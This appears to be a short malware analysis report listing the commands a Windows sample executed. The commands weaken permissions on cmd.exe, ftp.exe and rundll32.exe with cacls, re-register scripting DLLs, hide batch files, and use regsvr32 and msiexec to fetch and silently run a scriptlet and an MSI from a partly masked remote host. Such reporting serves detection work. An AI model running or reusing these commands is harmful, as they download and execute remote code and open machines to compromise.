Technical Information
- '<SYSTEM32>\taskkill.exe' /f /im regsvr32.exe
- '<SYSTEM32>\taskkill.exe' /f /im rundll32.exe
- 'js.##26bye.pw':280
- DNS ASK js.##26bye.pw
- ClassName: '' WindowName: ''
- '<SYSTEM32>\mode.com' con: cols=13 lines=1
- '<SYSTEM32>\cacls.exe' C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cacls.exe /e /g system:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g system:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\ftp.exe /e /g system:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\rundll32.exe /e /g everyone:f
- '<SYSTEM32>\regsvr32.exe' /s c:\Progra~1\Common~1\System\Ado\Msado15.dll
- '<SYSTEM32>\regsvr32.exe' /s jscript.dll
- '<SYSTEM32>\regsvr32.exe' /s vbscript.dll
- '<SYSTEM32>\regsvr32.exe' /s scrrun.dll
- '<SYSTEM32>\regsvr32.exe' /s WSHom.Ocx
- '<SYSTEM32>\regsvr32.exe' /s shell32.dll
- '<SYSTEM32>\attrib.exe' +s +h *.bat
- '<SYSTEM32>\regsvr32.exe' /u /s /i:http://js.###6bye.pw:280/v.sct scrobj.dll
- '<SYSTEM32>\msiexec.exe' /i http://js.###6bye.pw:280/helloworld.msi /q